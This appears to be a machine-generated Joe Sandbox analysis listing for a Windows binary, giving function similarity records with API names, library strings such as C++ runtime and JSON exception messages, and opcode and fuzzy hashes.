                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3013587201-537541572
                                                                                                    • Opcode ID: ca7c09baf792878f96d911292d21648074434898d998409f668d6f16be7d0add
                                                                                                    • Instruction ID: 295e5485d9642697e0f00200a4ce67a693ce802ce826aeac9f8470b45bf803f7
                                                                                                    • Opcode Fuzzy Hash: ca7c09baf792878f96d911292d21648074434898d998409f668d6f16be7d0add
                                                                                                    • Instruction Fuzzy Hash: D241FF26B29B0285FB16AF169C00176A395BF0CBA0FCE4975DD0E87385EE7CE9018730
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                    • String ID: out_of_range
                                                                                                    • API String ID: 1944019136-3053435996
                                                                                                    • Opcode ID: db60ccd60f14dcbcbf5858521f663935de6d7f86dd4ae4db5a2c6aada981dd98
                                                                                                    • Instruction ID: 072a89b5b785964fa8ca097f1701b5783e8f9295eb65d58f74514f2faed97803
                                                                                                    • Opcode Fuzzy Hash: db60ccd60f14dcbcbf5858521f663935de6d7f86dd4ae4db5a2c6aada981dd98
                                                                                                    • Instruction Fuzzy Hash: 3E71D663F08B8298FB00EF74D4503ADA362EF597A8F445771EA6C166DADE38D185C350
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                    • String ID: type_error
                                                                                                    • API String ID: 1944019136-1406221190
                                                                                                    • Opcode ID: 5fc9c34e79f061a2da8f41d5f3273fef25f1479915fd1783afdefc1fbe7e5777
                                                                                                    • Instruction ID: 0f6744e28de49ef380e503e50a8cfa9d1c485bca59c02c4c877b2bb65fe0bbb6
                                                                                                    • Opcode Fuzzy Hash: 5fc9c34e79f061a2da8f41d5f3273fef25f1479915fd1783afdefc1fbe7e5777
                                                                                                    • Instruction Fuzzy Hash: 6471D163F19B8688FB00EF74D4503BCA362EF59798F449671DE6C166D9EE38A085C350
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                    • String ID: invalid_iterator
                                                                                                    • API String ID: 1944019136-2508626007
                                                                                                    • Opcode ID: 095043f3bc64769925eb2570968ef23eacf279b81fb299f9ce2172f610b80348
                                                                                                    • Instruction ID: b11fdc4109127c3d302d90954df3debc1a8d26defacecf4081fa9115caf6a905
                                                                                                    • Opcode Fuzzy Hash: 095043f3bc64769925eb2570968ef23eacf279b81fb299f9ce2172f610b80348
                                                                                                    • Instruction Fuzzy Hash: C071C363F18B8288FB00EF74D4603ACA361EF59798F445771DE6C166D9EE38A085C354
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829165498-0
                                                                                                    • Opcode ID: 7d9f455a94f84a05f587d57d339c879795f99f0f1217d4298ff39db3fa6ba98e
                                                                                                    • Instruction ID: c73c96d193f9891cda040254cdca4db86ec762a66c12bbd6f86392757c5e0b0b
                                                                                                    • Opcode Fuzzy Hash: 7d9f455a94f84a05f587d57d339c879795f99f0f1217d4298ff39db3fa6ba98e
                                                                                                    • Instruction Fuzzy Hash: 2A81A272A0874186FB60AF15E840279B3E5FF487A8F980A71EA5D47BCADF3DD5018720
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID: ?
                                                                                                    • API String ID: 71445658-1684325040
                                                                                                    • Opcode ID: 7683199d481547234d5abb44f74d8fafb968323c0c38a5f9520d2a5466d55f74
                                                                                                    • Instruction ID: e024dc7e5139d9213f119bd4cbd55140caefb450a946b142228b39b5b5a8b994
                                                                                                    • Opcode Fuzzy Hash: 7683199d481547234d5abb44f74d8fafb968323c0c38a5f9520d2a5466d55f74
                                                                                                    • Instruction Fuzzy Hash: 0E41D172A18B8281FB509F25F48036AF7A1FF98B94F545635FA9D02A99DF3CD084CB40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 780b3f1f3aecbe1eb4b75bb10cd40d76e1f940e32b271abccdf7c11bca0f4dbd
                                                                                                    • Instruction ID: 517c4f7e11dd2f4136068ce81048f9d1d004ffae3f9f31ae9880cf18f3cf34e0
                                                                                                    • Opcode Fuzzy Hash: 780b3f1f3aecbe1eb4b75bb10cd40d76e1f940e32b271abccdf7c11bca0f4dbd
                                                                                                    • Instruction Fuzzy Hash: A1F0C221F1860682FB14AF64E44433AD360BF4C7A0FDC0A75C56E462E4DF7CD4488760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Window$DesktopRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991322523-0
                                                                                                    • Opcode ID: 9bb843e96bf88f01ecfc74e6437fb95d332e60f2b1f466af1cae0de28643ca82
                                                                                                    • Instruction ID: f41ca9cc5edb70b1f35cc542068dfc9e6fc415ba67de1c32ba20fdd85d2063cd
                                                                                                    • Opcode Fuzzy Hash: 9bb843e96bf88f01ecfc74e6437fb95d332e60f2b1f466af1cae0de28643ca82
                                                                                                    • Instruction Fuzzy Hash: 8C41C662E0878245FA10AB18E48137AE752EFC9BE0F944771EAAC06BD9DE3CD4818754
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: 029adb41c12981c097db0845c1b503877c108bf882051739f380996e4e9e8d04
                                                                                                    • Instruction ID: eb6f1f599375e00af79392a8ff115e9a102511b7bb6a80e6ad22ecd7fdda8f8e
                                                                                                    • Opcode Fuzzy Hash: 029adb41c12981c097db0845c1b503877c108bf882051739f380996e4e9e8d04
                                                                                                    • Instruction Fuzzy Hash: 2211D614A0E70646F9587F316C511BA92416F4C370E9C5FB4EA3E0A2D7ED2DB6418A31
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 0-1866435925
                                                                                                    • Opcode ID: 31e0a82fba1ac8404e5e10ce8532bc14ad0420340b639d160bc5b8383c4741d7
                                                                                                    • Instruction ID: bda656617733ab7c599bafe3d087ce4763d96ede9ce19672bdd57906dd8d7858
                                                                                                    • Opcode Fuzzy Hash: 31e0a82fba1ac8404e5e10ce8532bc14ad0420340b639d160bc5b8383c4741d7
                                                                                                    • Instruction Fuzzy Hash: E1919B72A08B8582EB94EB01E40436DB7A6FB48FC4FDA4072DA9E47754DF78D4A1C350
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                    • Opcode ID: a61b9dafeebeef71c778538e02d1dd93d241f4be75a88b4b5df5efb2b9ec5def
                                                                                                    • Instruction ID: 465c8edc1b9c677fd206d4ae8bbff4106542b8886bf0003e4bc51f2aa8d8be7e
                                                                                                    • Opcode Fuzzy Hash: a61b9dafeebeef71c778538e02d1dd93d241f4be75a88b4b5df5efb2b9ec5def
                                                                                                    • Instruction Fuzzy Hash: 1981B476E0D20385F774AF25C11027CB6E0EF1AB54FDD88B5CA2A57285DF2EE8219325
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: [json.exception.
                                                                                                    • API String ID: 0-791563284
                                                                                                    • Opcode ID: 32be17192377b44d0045321f6096eb201ecf12396ebc76e16d1da555cc750af0
                                                                                                    • Instruction ID: 1640811159b4a5255ca0bae64b0e3a5add7154cede83aa101aea46df914dbfbc
                                                                                                    • Opcode Fuzzy Hash: 32be17192377b44d0045321f6096eb201ecf12396ebc76e16d1da555cc750af0
                                                                                                    • Instruction Fuzzy Hash: 5E713562F14B8189F700EF79D8402ACA7A2EF94B94F9846B1DE5D17B8ACF78D481C350
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                    • String ID: csm$csm
                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                    • Opcode ID: 1075979170a2e9a18e477d88d2de6d235b634f407b84dd7ceece1c898f0d7b57
                                                                                                    • Instruction ID: a5ded584f26cd8320087d0f94894dad45d7adb4ece6a1734ddffce61f665117f
                                                                                                    • Opcode Fuzzy Hash: 1075979170a2e9a18e477d88d2de6d235b634f407b84dd7ceece1c898f0d7b57
                                                                                                    • Instruction Fuzzy Hash: 1651BF32A083828AFB74AF119444378B6A4FF58B84F9C59B5DA8C47785CF3DE891C751
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$GetctypeLocinfo::_Locinfo_ctorLockitLockit::_
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1612978173-1405518554
                                                                                                    • Opcode ID: 461f5172515d6199666a23d78f3aff95217434da73e3bc5dd098c4cb94a6e218
                                                                                                    • Instruction ID: a4973ddbd26191029204020b47cad8c97bb8117e63d9bb83d45cc3ef2a9ab68c
                                                                                                    • Opcode Fuzzy Hash: 461f5172515d6199666a23d78f3aff95217434da73e3bc5dd098c4cb94a6e218
                                                                                                    • Instruction Fuzzy Hash: F6515B32B09B418EFB10EF71E4602ACB3A5EF48B48F8848B5DE4D26A59DF38D5159364
                                                                                                    APIs
                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75A6F0D1F
                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75A6F0D25
                                                                                                      • Part of subcall function 00007FF75A720E88: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF75A72C3D2), ref: 00007FF75A720ED8
                                                                                                      • Part of subcall function 00007FF75A720E88: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF75A72C3D2), ref: 00007FF75A720F19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ExceptionFileHeaderRaise
                                                                                                    • String ID: exists$ios_base::badbit set
                                                                                                    • API String ID: 240014264-2074760687
                                                                                                    • Opcode ID: a5a59e918b60e0c8ffbbc047f386daa408d0b82dfff3e722bcb7dc2d295da79a
                                                                                                    • Instruction ID: dd89003da2251c51f4eb53cba4acdb17a28d79df6687903211c474e25a6ed2e5
                                                                                                    • Opcode Fuzzy Hash: a5a59e918b60e0c8ffbbc047f386daa408d0b82dfff3e722bcb7dc2d295da79a
                                                                                                    • Instruction Fuzzy Hash: CE414B72609AC694FA20EB14E4947EEB361FF88740F844672C68D43AA9EF7CD549CB50
                                                                                                    APIs
                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF75A70CF23), ref: 00007FF75A70D054
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF75A70CF23), ref: 00007FF75A70D0DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 953036326-0
                                                                                                    • Opcode ID: 3f62383259c36c84ae499e9679ffdb2c1832cde853ef017496f7ee74174e2e70
                                                                                                    • Instruction ID: 21de5a860e2a6d1d1f9ab7bf074e2feb5713a46c999a9bc5456495327709c483
                                                                                                    • Opcode Fuzzy Hash: 3f62383259c36c84ae499e9679ffdb2c1832cde853ef017496f7ee74174e2e70
                                                                                                    • Instruction Fuzzy Hash: 48911636F1875289F750AF6498402BDABA0BF19B88F9845B9DE0E57685CF3CD542CB30
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
